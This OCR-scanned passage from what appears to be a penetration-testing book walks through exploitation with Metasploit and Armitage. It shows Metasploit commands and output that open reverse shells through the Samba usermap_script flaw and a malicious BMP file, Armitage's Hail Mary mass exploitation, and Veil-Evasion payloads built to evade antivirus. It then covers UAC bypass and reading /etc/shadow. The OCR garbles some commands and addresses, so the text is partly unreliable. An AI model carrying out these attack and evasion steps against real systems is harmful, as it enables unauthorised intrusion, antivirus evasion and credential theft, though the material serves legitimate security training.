amba lsa_io_privilege_set Heap Overflow 
auxiliary /dos/samba/1 sa_t ransnames_heap 
amba Isaiot rans_names Heap Overflow 

exploit/f reebsd/samba/t rans2open 2003-04-07 



normal S 

normal S 

normal S 

great S 



[ 100 ] 



Chapter 4 



The exploit/multi/samba/usermap_script exploit was selected for use in 
the remainder of this example because it is ranked as excellent. This ranking was 
determined by the Metasploit development team and identifies how reliably the 
exploit works for a skilled tester against a stable target system. In real life, multiple 
variables (tester skills, protective devices on the network, and modifications to the 
operating system and hosted applications) can work together to significantly alter 
the reliability of the exploit. 

Additional information pertaining to that exploit was obtained using the following 
info command: 

msf> info exploit/multi/samba/usermapscript 

The returned information includes references as well as the information shown in the 
following screenshot: 

msf > info exploit/multi/samba/use rmap_sc ript 

Name: Samba "username map script" Command Execution 
Module : exploit/multi/samba/use rmap_sc ript 
Platform: Unix 
Privileged: Yes 

License: Metasploit Framework License (BSD) 

Rank: Excellent 

Provided by: 

jduck <] ducktametasploit .com> 

Available targets: 

Id Name 

G Automatic 

Basic options: 

Name Current Setting Required Description 

RHOST yes The target address 

RPORT 139 yes The target port 

Payload information: 

Space: 1G24 

Desc ription : 

This module exploits a command execution vulerability in Samba 
versions 3.G.20 through 3.0.25rc3 when using the non-default 
"username map script" configuration option. By specifying a username 
containing shell meta characters, attackers can execute arbitrary 
commands. No authentication is needed to exploit this vulnerability 
since this option is used to map usernames prior to authentication! 
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To instruct Metasploit that we will attack the target with this exploit, we issue the 
following command: 

msf> use exploit/multi/samba/usermap_script 

Metasploit changes the command prompt from msf > to msf exploit 
(usermap_script ) >. 

Metasploit prompts the tester to select the payload (a reverse shell from the 
compromised system back to the attacker) and sets the other variables listed 
as follows: 

• Remote host (RHOST): This is the IP address of the system being attacked 

• Remote port (RPORT): This is the port number that is used for the exploit 

• Local host (LHOST): This is the IP address of the system used to launch 
the attack 

The attack is launched by entering the exploit command at the prompt after all 
variables have been set. Metasploit initiates the attack and confirms that a reverse 
shell is present by indicating command shell l opened and giving the IP addresses 
that originate and terminate the reverse shell. 

To verify that a shell is present, the tester can issue queries for the hostname, 
username (uname -a), and whoami to confirm that the results are specific to the target 
system that is located at a remote location. Take a look at the following screenshot: 

msf exploit (usermapscript) > set PAYLOAD cmd/unix/ reverse 
PAYLOAD => cmd/unix/ reverse 

msf exploit (usermapscript) > set RHOST 192.168.14.129 
RHOST => 192.168.14.129 

msf exploit (usermapscript) > set RPORT 445 
RPORT => 445 

msf exploit (usermapscript) > set LHOST 192.168.14.128 

LHOST => 192.168.14.128 

msf exploit (usermapscript) > exploit 

[*] Started reverse double handler 

[*] Accepted the first client connection... 

[*] Accepted the second client connection... 

[*] Command: echo EBIVvRXgD0ENzz2q; 

[*] Writing to socket A 
[*] Writing to socket B 
[*] Reading from sockets... 

[*] Reading from socket B 
[*] B: "EBIVvRXgD0ENzz2q\r\n" 

[*] Matching... 

[*] A is input . . . 

[*] Command shell session 1 opened (192.168.14.128:4444 -> 192.168.14.129:48108) 
at 2013-09-02 13:48:49 -0400 

hostname 
metasploit able 

uname -a 

Linux metasploitable 2 .6 .24- 16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 G 
NU/Linux 

whoami 

root I 
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When a system is compromised to this extent, it is ready for the post-exploitation 
activities ( see Chapter 5, Post Exploit - Action on the Objective and Chapter 6, Post Exploit 
- Persistence). To add new exploits to Metasploit, in Ruby script ( . rb) or Python ( . py), 
place them in the hidden . msf 4 folder located in your home directory, and then 
reload msf console. 

Exploiting a vulnerable application 

The Metasploit Framework is equally effective against vulnerabilities in the 
operating system as well as third-party applications. In this example, well exploit 
a buffer overflow vulnerability that was identified in Chasys Draw IES (Version 
4.10.01). The vulnerability exists in the ReadFile function, which is used to store 
user-provided data in an insecure way. Exploitation results in arbitrary code 
execution under the context of the user. 

To initiate the attack, the tester needs to generate a specially crafted BMP file and 
then get the victim to open that file in the Chasys application. When this occurs, it 
will compromise the base operating system (effective against Windows XP SP3 and 
Windows 7 SP1). 

The first step is to open msf console and set Metasploit to use exploit/windows/ 
f ileformat/chasys_draw_ies_bof, as shown in the following screenshot: 

msf > use exploit/windows/fileformat/chasys_draw_ies_bmp_bof 

msf exploit (chasys_draw_ies_bmp_bof) > set payload windows/mete rpreter/reverse_tcp 
payload => windows/mete rpreter/reverse_tcp 

msf exploit ( chasysdrawiesbmpbof ) > set LHOST 192.168.75.130 
LHOST => 192.168.75.130 

msf exploit (chasysdrawiesbmpbof ) > exploit 
[+1 msf. bmp stored at /root/ .msf4/local/msf .bmp 



Again, the exploit is a relatively simple exploit. It requires the tester to set a reverse 
shell (reverse_tcp) from the compromised system back to the tester's system, the 

Local Host (LHOST). 

When the exploit is completed, it creates the specially-crafted BMP file, which is 
stored with the default name of msf . bmp. To entice the target to open the file and 
avoid a default name that may be detected by some devices, it is best to change 
the filename to something that is more relevant to the intended target. 



[ 103 ] 



Exploit 



The next step is to open a new instance of msf console, and set up a listener for 
the incoming reverse TCP shell that will originate from the target when it is 
compromised. A simple listener is shown in the following screenshot: 

msf > use exploit/multi/handler 

msf exploit (handler) > set payload windows/mete rpreter/reverse_tcp 

payload => windows/mete rpreter/reverse_tcp 

msf exploit (handler) > set LHOST 92.168.75.130 

LHOST => 92.168.75.130 

msf exploit (handler) > exploit 

[-] Handler failed to bind to 92.168.75.130:4444 
[*] Started reverse handler on 0.0.0.0:4444 
[*] Starting the payload handler. . . 



Once the victim opens the crafted BMP image file in the vulnerable application, 
a meterpreter session is opened between the two systems. The msf prompt is 
replaced by the meterpreter prompt and the tester can effectively access the remote 
system with a command shell. One of the first steps after the compromise is to verify 
that you are on the target system; as you can see in the following screenshot, the 
sysinf o command identifies the computer name and operating system, verifying a 
successful attack: 



msf exploit [handler ) > exploit 

[-] Handler failed to bind to 92.168.75.130:4444 
| ! i Started reverse handler on 0,0,0.0:4444 
L + ] Starting the payload handler,*. 

( Sending stage (769024 bytes) to 192.168.75.1 

p Meterpreter session 1 opened (192.168.75.130:4444 -> 192.168.75.1:2008) at 2 
014-03-15 01:17:38 -0400 

meterpreter > sysinfo 
Computer : DIGITALDEF01 

OS : Windows 7 (Build 7601, Service Pack 1). 

Architecture : x64 (Current Process is WGW64) 

System Language : en_CA 

Meterpreter : x86/win32 

meterpreter > 
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Exploiting multiple targets with Armitage 

Armitage is frequently overlooked by penetration testers who eschew its GUI 
interface in favor of the traditional command-line input of the Metasploit console. 
However, it possesses Metasploit's functionality while giving visibility to its many 
possible options, making it a good alternative in complex testing environments. 
Unlike Metasploit, it also allows you to test multiple targets at the same time — up to 
512 targets at once. 

To start Armitage, ensure that the database and Metasploit services are started using 
the following command: 

service postgresql start 
service metasploit start 

After that step, enter armitage over the command prompt to execute the command. 
Armitage does not always execute cleanly and it may require the launch steps to be 
repeated to ensure that it is functioning correctly. 

To discover available targets, you can manually add a host by providing its IP 
address or select an nmap scan from the Hosts tab on the menu bar. Armitage can 
also enumerate targets using MSF auxiliary commands or DNS enumeration. 

Armitage can also import host data from the following files: Acunetix, amap, 
AppScan, Burp proxy, Foundstone, Microsoft Baseline Security Analyzer, Nessus 
NBE and XML files, NetSparker, NeXpose, nmap, OpenVas, Qualys, and Retina. 

The initial Armitage start-screen is shown in the following screenshot: 
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Armitage allows you to set a host label by selecting a host using a right-click, and 
then going to the Host menu and selecting the Set Label... function. This allows you 
to flag a particular address or identify it by a common name, which is helpful when 
using team-based testing. This process is shown in the following screenshot: 




£et Label... 
Be move Host 



Qi 


Input 

Set label to: 


Pnmary Target 




Cancel OK | 



Armitage also supports dynamic workspaces — a filtered view of the network based 
on network criteria, operating system, open ports and services, and labels. For 
example, you may test a network and identify several servers that do not appear to 
be patched to the extent of the remainder of the network. These can be highlighted 
by giving them a label and then placing them in a priority workspace. 

Once you have identified the target systems that are present on a network, you can 
select specific modules to implement as part of the exploitation process. You can also 
use the Attacks option in the menu bar to find attacks. 

To exploit a host, select it with a right-click, navigate to the Attack item, and choose 
an exploit (make sure that the operating system is set for the correct host; this does 
not always happen automatically). 

One interesting option is Hail Mary, located under the Attacks option. By selecting 
this function, all identified systems are automatically subjected to exploits to achieve 
the greatest number of possible compromises. This is a very noisy attack and should 
therefore be used as a test choice of the last resort. It is also an excellent way to 
determine if an intrusion detection system is implemented and configured properly! 
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A system that is compromised shows up as an icon with a red border with electrical 
sparks. In the next screenshot, two test systems have been compromised and there 
are four active sessions in place between these systems and the tester. The Active 
Sessions panel indicates the connections and identifies what exploit was used to 
compromise the target. Take a look at the following screenshot that represents the 
different options: 



Armitage View Hosts Attacks Workspaces Help 




[ Console X } Workspaces xT Scan X J Hail Mary X ] 



Active sessions 



Information Connection 



1 shell php 192.168.43.130:45323 -> 192.168.43.129:19838 (192.168.43.129) 

exploit/multi/http/php_cgi_arg_injection 

2 meterpreter java/java 192.168.43.130:52826 -> 192.168.43.129:20767 (192.168.43.129) 

exploit/multi/misc/ j ava_rmi_se rve r 

3 shell 192.168.43.130:40725 -> 192.168.43.129:1940 (192.168.43.129) 

e x p loi t /u ni x /i r c /u n re a l_i rc d_328 l_b a c k d o o r 

4 shell 192.168.43.130:35884 -> 192.168.43.129:6200 (192.168.43.129) 

exploit/unix/ftp/vsftpd_234_backdoor 




During a penetration test that was conducted, the Hail Mary 
option identified two exploitable vulnerabilities with the target 
and initiated two active sessions. Manual testing with the same 
target eventually identified eight exploitable vulnerabilities, with 
multiple communications channels between the compromised 
system and the tester. Real-world tests of this type reinforce 
the advantages and weaknesses of automated tools during the 
penetration testing process. 



Team testing with Armitage 

Armitage is more than a GUI frontend for the Metasploit Framework; it is a 
scriptable penetration testing tool that allows a team to use a single instance of the 
Metasploit Framework so that the GUI displays the following functions: 

• It uses the same session, allowing one tester to oversee the process, identify 
findings of interest, and control the direction of testing. 

• It runs scripts to automate testing tasks. 
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• It shares downloaded files such as password files. This allows one team 
member to focus on password cracking, while other team members continue 
the exploitation phase. 

• It communicates using a shared event log. 

To take advantage of the team configuration, ensure that Armitage is not already 
running and then invoke the teamserver script from a console prompt in the 
Armitage directory, usually / usr/share / armitage, as follows: 

root@kali : /usr/share/armitage# . /teamserveripaddress password 

Ensure that the IP address is correct, as it is not verified by Armitage, and that all 
team members can access the host on port 55553. When you start the Armitage 
team server, it communicates with team members using an SSL certificate; team 
members should verify that the SHA-1 hash of the certificate matches the server's 
SSL certificate. 

Do not connect to 12 7 . o . 0 . l when the teamserver script is running, as Armitage 
uses that IP address to connect and determine whether it should use SSL 
(teamserver or a remote address) or non-SSL (localhost or msf rpcd). To connect 
Armitage to teamserver locally, use the external IP address in the Host field. 

Users can open one or more command shells, browse files, download data, and take 
screenshots. Shell sessions are automatically locked when in use, and then unlocked. 
However, some meterpreter scripts may fail to function over time. 

To communicate as a team, the View option in the menu opens the shared event log. 
You can make entries onto the log as you would if you were using IRC or some other 
chat room, and the log keeps a permanent record of all comments. 

Scripting the Armitage attack 

Armitage includes the Cortana scripting language, which is based on Sleep, an 
extensible language that resembles Perl. Cortana scripts may define keyboard 
shortcuts, insert menus, and create unique user interfaces. 

Scripts may be run as standalone entities (which requires that the Armitage team 
server be active) or directly from Armitage. To load an existing script, select 
Armitage in the main menu bar, and then select Scripts. A tabbed view will open 
and a button will give you the option to load a script. 

Armitage also provides a scripting environment which is invoked from the View | 
Script Console tab of the menu, as seen in the following screenshot: 
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[ Console X j nmap X j Scripts X j Cortana Xj_ 



cortana> help 

Commands 

askoff 

askon 

help 

load 

logoff 

logon 

Is 

proff 

profile 

pron 

reload 

troff 

tron 

unload 



A sample script to fully scan target systems using the Metasploit Framework could 
be written as scanner . cna. Whenever a new host is added (host_add), the MSF port 
scanner will scan for a defined list of TCP ports and for available UDP ports. Take a 
look at the following code snippet, which shows the scanner script: 

# MSF port scanner 
onhost_add { 

println ( " [*] MSF Port Scanner New Host OpenPorts on$l"); 

$console = console ( ) ; 

cmd ( $console , "use auxiliary/scanner/portscan/tcp" ) ; 
cmd ( $console , "set THREADS 12"); 
cmd ( $console , "set PORTS 139, 143"); 

# enter other ports as required 
cmd ( $console , "set RHOSTS $1"); 
cmd ( $console , "run -j"); 

cmd ( $console , "use auxiliary/scanner/discovery/udp_sweep" ) ; 

cmd ( $console , "set THREADS 12"); 

cmd ( $console , "set BATCHSIZE 256"); 

cmd ( $console , "set RHOSTS $1"); 

cmd ( $console , "run -j"); 

db_sync ( ) ; 

} 

Because Cortana has extensive hooks into the Metasploit Framework, scripts can be 
used to automatically launch exploits, conduct post-exploitation activities, such as 
tracking user activity, and facilitate multiuser activities across the attacker's kill chain. 
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Bypassing IDs and antivirus detection 

The exploitation phase of the kill chain is the most dangerous one for the penetration 
tester or attacker — they are directly interacting with the target network or system 
and there is a great chance for their activity to be logged or their identity discovered. 
Again, stealth must be employed to minimize risks to the tester. Although no specific 
methodology or tool is undetectable, there are some configuration changes and 
specific tools that will make detection more difficult. 

When considering remote exploits, most networks and systems employ various 
types of defensive controls to minimize the risk of attack. Network devices include 
routers, firewalls, intrusion detection and prevention systems, and malware 
detection software. 

To facilitate exploitation, most frameworks incorporate features to make the attack 
somewhat stealthy. The Metasploit Framework allows you to manually set evasion 
factors on an exploit-by-exploit basis; however, determining which factors (such 
as encryption, port number, filenames, and others) can be difficult and change for 
each particular ID. The Metasploit Framework also allows communication between 
the target and the attacking systems to be encrypted (the windows/meterpreter/ 
reverse_tcp_rc4 payload), making it difficult for the exploit payload to be detected. 

Metasploit Pro, available as a trial on the Kali distribution, includes the following to 
specifically bypass intrusion detection systems: 

• Scan speed can be adjusted in the settings for Discovery Scan, reducing the 
interaction speed with the target by setting the speed to sneaky or paranoid 

• Implement transport evasion by sending smaller TCP packets and increasing 
the transmission time between the packets 

• Reducing the number of simultaneous exploits launched against a 
target system 

• Application-specific evasion options for exploits that involve DCERPC, 
HTTP, and SMB can be automatically set 

Most antivirus software rely on signature matching to locate viruses and other 
malware. They examine each executable for strings of code known to be present in 
viruses (the signature) and create an alarm when a suspect string is detected. Many 
of Metasploit' s attacks rely on files that may possess a signature that, over time, has 
been identified by antivirus vendors. 

In response to this, the Metasploit Framework allows standalone executables to be 
encoded to bypass detection. Unfortunately, extensive testing of these executables at 
public sites, such as virustotal . com, have lessened their effectiveness in bypassing 
the AV software. 
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A new AV-evasion framework, written by Chris Truncer, called Veil-Evasion 
(www . Veil - Evasion . com), is now providing effective protection against the 
detection of standalone exploits. Veil-Evasion aggregates various shellcode injection 
techniques into a framework that simplifies management. 

As a framework, Veil-Evasion possesses several features, which includes 
the following: 

• It incorporates custom shellcode in a variety of programming languages, 
including C, C#, and Python 

• It can use Metasploit-generated shellcode 

• It can integrate third-party tools such as Hyperion (encrypts an EXE file with 
AES-128 bit encryption), PEScrambler, and BackDoor Factory 

• The Veil -Evasion evasion . cna script allows for Veil-Evasion to be 
integrated into Armitage and its commercial version. Cobalt Strike 

• Payloads can be generated and seamlessly substituted into all PsExec calls 

• Users have the ability to reuse shellcode or implement their own 
encryption methods 

• It's functionality can be scripted to automate deployment 

• Veil-Evasion is under constant development and the framework has 
been extended with modules such as Veil-Evasion-Catapult (the payload 
delivery system) 

Veil-Evasion can generate an exploit payload; the standalone payloads include the 
following options: 

• Minimal Python installation to invoke shellcode; it uploads a minimal 
Python . zip installation and the 7zip binary. The Python environment is 
unzipped, invoking the shellcode. Since the only files that interact with the 
victim are trusted Python libraries and the interpreter, the victim's AV does 
not detect or alarm on any unusual activity. 

• Sethc backdoor, which configures the victim's registry to launch the sticky 
keys RDP backdoor. 

• PowerShell shellcode injector. 

When the payloads have been created, they can be delivered to the target in one of 
the following two ways: 

• Upload and execute using Impacket and PTH toolkit 

• UNC invocation 
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Veil-Evasion is available from the Kali repositories, such as Veil-Evasion, and it is 
automatically installed by simply entering apt-get install veil-evasion in a 
command prompt. 




If you receive any errors during installation, re-run the 
/usr/ share /veil -evasion/ setup/ setup . sh script. 



] 



Veil-Evasion presents the user with the main menu, which provides the number of 
payload modules that are loaded as well as the available commands. Typing list 
will list all available payloads, list langs will list the available language payloads, 
and list < language > will list the payloads for a specific language. Veil-Evasion's 
initial launch screen is shown in the following screenshot: 



Veil-Evasion | [Version]: 2.4.3 


[Web]: https: //www. 


. veil - f ramewo rk .com/ 


f | [Twitter] : @VeilF ramewo rk 


Main Menu 








24 payloads loaded 






Available commands: 








use 


use a specific 


payload 




info 


information on 


a specific 


payload 


list 


list available 


payloads 




update 


update Veil to 


the latest 


version 


clean 


clean out payload folders 




checkvt 


check payload hashes vs. 


VirusTotal 


exit 


exit Veil 
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Veil-Evasion is undergoing rapid development with significant releases on a 
monthly basis and important upgrades occurring more frequently. Presently, there 
are 24 payloads designed to bypass antivirus by employing encryption or direct 
injection into the memory space. These payloads are shown in the next screenshot: 



Veil -Evasion 


| [Version] : 2.4.3 


[Web] : https: 


//www. veil -framework .com/ | [Twitter]: @VeilF ramewo rk 


[*] Available 


payloads: 


1) 


c /met erp reter/ rev_tcp 


2) 


c/mete rp rete r/ rev_t cp_se rvice 


3) 


c /shell code_inj ect /virtual 


4) 


c/shellcode inject/void 


5) 


cs/meterp reter/ rev_ top 


6) 


cs/shellcode inj ect/base64 substitution 


7] 


cs/shellcode_inj ect /virtual 


8) 


native/Hyperion 


9) 


native/backdoor factory 


10) 


native/pe_sc rambler 


11) 


powershell/shellcode inj ect /download virtual 


12) 


powe rshell /shell code_inj ect/psexec_virtual 


13) 


powe rshell/shellcode_inj ect /virtual 


14) 


python/meterpreter/rev http 


15) 


pyt hon/met erp reter/ rev_http_contained 


16) 


pyt hon/met erp reter/ rev_https 


17) 


python/meterpreter/rev https contained 


18) 


pyt hon/met erp reter/ rev_tcp 


19) 


python/shellcode_inj ect/aes_enc rypt 


20) 


python/shellcode_inj ect/a rc_enc rypt 


21) 


python/shellcode inj ect/base64 substitution 


22) 


python/ shellcode_inj ect/des_enc rypt 


23) 


python/shellcode_inj ect/flat 


24) 


python/shellcode inject/letter substitution 
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To obtain information on a specific payload, type inf o<payload number / payload 
name> or info <tab> to autocomplete the payloads that are available. You can also 
just enter the number from the list. In the following example, we entered 19 to select 
the python/ shellcode_inj ect/ aes_encrypt payload: 



Payload: python/shellcodeinject/aesencrypt loaded 



Required Options: 

Name Current Value Description 



compile_to_exe Y 

expire_payload X 

inj ectjnethod Virtual 

use_pyherion N 



Available commands: 



Compile to an executable 

Optional: Payloads expire after "X" days 

Virtual, Void, Heap 

Use the pyherion encrypter 



set 

info 

generate 

back 

exit 



set a specific option value 
show information about the payload 
generate payload 
go to the main menu 
exit Veil 



The exploit includes an expire_payload option. If the module is not executed by 
the target user within a specified timeframe, it is rendered inoperable. This function 
contributes to the stealthiness of the attack. 

The required options include the name of the options as well as the default values 
and descriptions. If a required value isn't completed by default, the tester will need 
to input a value before the payload can be generated. To set the value for an option, 
enter set coption name> and then type the desired value. To accept the default 
options and create the exploit, type generate in the command prompt. 

If the payload uses shellcode, you will be presented with the shellcode menu, where 
you can select ms f venom (the default shellcode) or a custom shellcode. If the custom 
shellcode option is selected, enter the shellcode in the form of \x0i\x02, without 
quotes and newlines (\n). If the default ms f venom is selected, you will be prompted 
with the default payload choice of windows /meterpreter/ reverse_tcp. If you wish 
to use another payload, press Tab to complete the available payloads. The available 
payloads are shown in the following screenshot: 
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[?] Use msfvenom or supply custom shellcode? 

1 - msfvenom (default) 

2 - Custom 



[>] Please enter the number of your choice: 1 

[*] Press [enter] for windows/mete rp refer/ re verse_tcp 
[*] Press [tab] to list available payloads 



[>] Please enter metasploit 
windows/adduser 
windows/dllinj set/ 
windows/dns_txt_que ry_exec 
windows/downi oad_exec 
windows/exec 
windows /I o a dl i b ra ry 
windows/messagebox 
windows/mete rp rete r/ 
windows/met svc_bind_tcp 
w indows/metsvc reverse tcp 



payload: windows/ 
windows/patchupdllinj ect/ 
windows/patchupmete rp rete r/ 
windows/shell/ 
windows/shell_bind_tcp 
windows/shell_bind_tcp_xpfw 
windows/shell_reverse_tcp 
windows/speak_pwned 
windows/upexec/ 
windows/vncinj ect/ 
windows/x64/ 



In the following example, the [tab] command was used to demonstrate some of the 
available payloads; however, the default (windows/meterpreter/reverse_tcp) was 
selected, as shown in the following screenshot: 

[?] Use msfvenom or supply custom shellcode? 

1 - msfvenom (default) 

2 - Custom 

[>] Please enter the number of your choice: 1 

[*] Press [enter] for windows/meterpreter/reverse_tcp 
[*] Press [tab] to list available payloads 
[>] Please enter metasploit payload: 

[>] Enter value for 1 LHOST 1 , [tab] for local IP: 192.168.43.134 
[>] Enter value for 1 LPORT 1 : 4444 

[>] Enter extra msfvenom options in OPTIGN=value syntax: 

[*] Generating shellcode. . . 
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The user will then be presented with the output menu with a prompt to choose 
the base name for the generated payload files. If the payload was Python-based 
and you selected compile_to_exe as an option, the user will have the option 
of either using Py ins taller to create the EXE file, or generating Py2Exe files, 
as shown in the following screenshot: 

[*] Press [enter] for 'payload' 

[>] Please enter the base name for output files: update 

[?] How would you like to create your payload executable? 

1 - Pyinstaller (default] 

2 - Py2Exe 

[>] Please enter the number of your choice: 1 | 



The final screen displays information on the generated payload, as shown in the 
following screenshot: 



Veil -Evasion | [Version]: 2.4.3 



[Web]: https://www.veil-framework.com/ | [Twitter]: (aVeilFramework 



[*] Executable written to: /root/veil-output/compiled/updatel . exe 



Language : 

Payload : 

Shellcode : 

Options : 

Required Options: 

Payload File: 
Handler File : 



python 

python/shellcode_in] ect/aes_enc rypt 
windows/mete rp ret e r/ reve rse_t c p 
LHQST=192 .168.43.134 LPQRT=4444 
compile_to_exe=Y expire_payload=X 
inj ect_method=Vi rtual use_pyhe rion=N 
/root/veil -output/sou rce/updatel .py 
/root/veil -output/handlers/updatel_handler. rc 



[ *] Your payload files have been generated, don't get caught! 

[!] And don't submit samples to any online scanner! j) 



The exploit could also have been created directly from a command line using the 
following options: 

kali@linux: /Veil -Evasion . py -p python/shellcode_inj ect/ 
aes_encrypt -o -output - -msfpayload windows/meterpreter/ 
reversetcp - -msf options LHOST=192 . 168 . 43 . 134 LPORT=4444 
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Once an exploit has been created, the tester should verify the payload against 
VirusTotal to ensure that it will not trigger an alert when it is placed on the target 
system. If the payload sample is submitted directly to VirusTotal and it's behavior 
flags it as malicious software, then a signature update against the submission can 
be released by antivirus (AV) vendors in as little as one hour. This is why users are 
clearly admonished with the message "don't submit samples to any online scanner!" 

Veil-Evasion allows testers to use a safe check against VirusTotal. When any payload 
is created, a SHA1 hash is created and added to hashes . txt, located in the ~/veil- 
output directory. Testers can invoke the checkvt script to submit the hashes to 
VirusTotal, which will check the SHA1 hash values against its malware database. If a 
Veil-Evasion payload triggers a match, then the tester knows that it may be detected 
by the target system. If it does not trigger a match, then the exploit payload will 
bypass the antivirus software. A successful lookup (not detectable by AV) using the 
checkvt command is shown as follows: 



Available commands 






use 


use a specific payload 




info 


information on a specific 




list 


list available payloads 




update 


update Veil to the latest 




clean 


clean out payload folders 




checkvt 


check payload hashes vs. ' 




exit 


exit Veil 


[>] 


Please enter a 


command: checkvt 


[*] 


Checking Virus 


Total for payload hashes. . . 


[*] 


No payloads found on Viruslotal! 



Testing, thus far supports the finding that if checkvt does not find a match on 
VirusTotal, the payload will not be detected by the target's antivirus software. To 
use with the Metasploit Framework, use exploit/multi/handler and set payload 
to be windows/meterpreter/reverse_tcp (the same as the Veil-Evasion payload 
option), with the same LHOST and LPORT used with Veil-Evasion as well. When the 
listener is functional, send the exploit to the target system. When the listeners launch 
it, it will establish a reverse shell back to the attacker's system. 
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Summary 

In this chapter, we focused on exploits as the tool that converts the findings from 
reconnaissance into a defined action that establishes access between the tester and 
the target. 

Kali provides several tools to facilitate the development, selection, and activation 
of exploits, including the internal exploit-db database as well as several frameworks 
that simplify the use and management of the exploits. Among these frameworks, the 
Metasploit Framework and Armitage are particularly important; however, 
Veil-Evasion enhances both with its ability to bypass antivirus detection. 

The next two chapters focus on the most important part of the attacker's kill chain— the 
post-exploitation activities. This is the part of the attack where the attackers achieve 
their objective. Typical post-exploitation activities include theft and exfiltration of data 
(proprietary or financial information), horizontal escalation by taking advantage of 
poor access controls, and vertical escalation by theft of user credentials. 
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on the Objective 

In the modern world of hacking and system attacks, attackers are not as concerned 
with exploitation as they are with what can be done with that access. This is the part 
of the kill chain where the attacker achieves the full value of the attack. 

Once a system has been compromised, the attacker generally performs the 
following activities: 

• Conducts a rapid assessment to characterize the local environment 
(infrastructure, connectivity, accounts, presence of target files, and 
applications that can facilitate further attacks) 

• Locates and copies or modifies target files of interest, such as datafiles 
(proprietary data and financial information) 

• Creates additional accounts and modifies the system to support 
post-exploitation activities 

• Attempts to vertically escalate the privilege level used for access by 
capturing administrator or system-level credentials 

• Attempts to attack other data systems (horizontal escalation) by pivoting the 
attack through the compromised system to the remainder of the network 

• Installs persistent backdoors and covert channels to retain control and have 
secure communications with the compromised system (this is covered in 
Chapter 6, Post Exploit - Persistence) 

• Removes indications of the attack from the compromised system 

To be successful, the post-exploit activities require comprehensive knowledge of the 
target's operating system and file structure to ensure that protective controls can be 
bypassed. The first post-exploitation step is a reconnaissance of the compromised 
system in the context of the local network. 




Post Exploit - Action on the Objective 

In this chapter, you will learn the following: 



• How to bypass Windows User Account Control (UAC) 

• How to conduct a rapid reconnaissance of a compromised system 

• How to obtain sensitive data from a compromised system (pillaging) 

• How to create additional accounts 

• How to use Metasploit Framework to conduct post-exploitation activities 

• Vertical and horizontal escalation techniques to improve your access rights 
and increase the number of compromised accounts 

• How to use anti-forensic techniques to cover your tracks and prevent the 
compromise from being discovered 

Bypassing Windows User Account 
Control 

In Windows Vista and higher versions, Microsoft introduced security controls to 
restrict processes from running at three different integrity levels: high, medium, and 
low. A high integrity process has administrator rights, a medium-level process runs 
with a standard user's rights, and a low integrity process is restricted, enforcing that 
programs do minimal damage if they are compromised. 

To perform any privileged actions, a program must run as an administrator and 
comply with the UAC settings. The four UAC settings are as follows: 

• Always notify: This is the most stringent setting, and it will prompt the local 
user whenever any program wants to use higher level privileges. 

• Notify me only when programs try to make changes to my computer: 

This is the default UAC setting. It does not prompt the user when a native 
Windows program requests higher level privileges. However, it will prompt 
if a third-party program wants elevated privileges. 

• Notify me only when programs try to make changes to my computer 
(don’t dim my desktop): This is the same as the default setting, but it does 
not dim the system's monitor when prompting the user. 

• Never notify: This option reverts the system to pre-Vista days. If the user is 
an administrator, all programs will run with high integrity. 
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Therefore, immediately after exploitation, the tester (and attacker) wants to know the 
following two things: 

• Who is the user that the system has identified? 

• What rights do they have on the system? 

This can be determined using the following command: 

C:\> whoami /groups 

A compromised system is operating in a high-integrity context, as shown by the 
Mandatory Label\High Mandatory Level Label in the following screenshot: 



C : \>whoa«i /groups 
GROUP INFORMATION 

Group Nawe 



Type 



Attributes 



Everyone 

dd_wor kst at i onl\or a_dba 

BUILTIN\Adairristrators 

*ner 

BUlLTlN\Users 

NT AUTHOR ITY\ INTERACTIVE 

CONSOLE LOGON 

NT AUTHORITY\Authenti cited Users 
NT AUTHOR I TY\ This Organization 
LOCAL 

NT AUTHORITY\NTLM Authentication 



8888 BB8B8BB8 



Well -known group S-l-1-0 Mandatory group 
Alias S- 1- S-21- 1261S7 3383- 3819712627- 14 S4010182- 1040 Mandatory group 
Alias S-l-5-32-544 Mandatory group 
Alias S-1-S-32-S4S Mandatory group 
Well -kr>o*n group S-l-S-4 Mandatory group 
Wei 1 -known group S-l-2-1 Mandatory group 
well-known group S-l-S-11 Mandatory group 
Well-known group S-1-S-1S Mandatory group 
well-known group S- 1-2-0 Mandatory group 
Well-known group S-l-S-64-10 Mandatory group 

ory group 



wand NT AUTHOR ITY\NTLM Authentication Well-known group S-l- 5-64-10 
Mandatory Label \High Mandatory Level Label ^ S-l-16-12288 



If the Label is Mandatory Label \Medium Mandatory Level, the tester will need 
to elevate from standard user privileges to administrator rights for many of the 
post-exploit steps to be successful. 

The first option to elevate privileges is to run exploit/windows/local/ask, 
from Metasploit, which launches the RunAs attack. This will create an executable 
that, when invoked, will run a program to request elevated rights. The executable 
should be created using the EXE : : Custom option or encrypted using Veil-Evasion 
to avoid detection by the local antivirus. 

The disadvantage of the RunAs attack is that the user will be prompted that a 
program from an unknown publisher wants to make changes to the computer. 

This alert may cause the privilege escalation to be identified as an attack. 
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If the system's current user is in an administrator's group, and if the UAC is 
set to the default Notify me only when programs try to make changes to my 
computer (it will not work if set to Always Notify), an attacker will be able to use the 
Metasploit exploit/windows/local/bypassuac module to elevate their privileges. 

The bypassuac module creates multiple artifacts on the target system and can be 
recognized by most antivirus software. However, the exploit/windows/local/ 
bypassuac_in j ect module places the executable directly into a reflective DLL 
running in memory, and it does not touch the hard disk, minimizing the opportunity 
for detection by the antivirus software. 

Some caveats when attempting to bypass the UAC controls are as follows: 

• Bypass UAC attacks do not work against Windows Vista where the user 
needs to acknowledge every privileged access. 

• Windows 8 remains vulnerable to this attack. However, Metasploit 
Framework attack does not presently work with Windows 8.1. If it is 
attempted, the user will be prompted to click on an OK button before the 
attack can obtain elevated privileges — which is hardly a stealthy attack. 
Attackers can modify the attack by selecting to use exploit/windows/ 
local /ask, which will improve the chance of success. 

• When considering system-to-system movement (horizontal/ lateral 
escalation), and if the current user is a domain user with local admin 
privileges on other systems, you can use the existing authentication token 
to gain access and bypass UAC. A common attack to achieve this is the 
Metasploit exploit /windows/local / current_user_psexec. 

Conducting a rapid reconnaissance of 
a compromised system 

Once a system has been compromised, the attacker needs to gain critical information 
about that system, its network environment, users, and user accounts. Usually, 
they will enter a series of commands or a script invoking these commands from 
the shell prompt. 
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If the compromised system is based on the Unix platform, typical local 
reconnaissance commands will include the following: 



Command 


Description 


/etc/resolv . conf 


Use the copy command to access and review the 
system's current DNS settings. Because it is a global 
file with read privileges, it will not trigger alarms 
when accessed. 


/ et c/pas swd and /etc/ shadow 
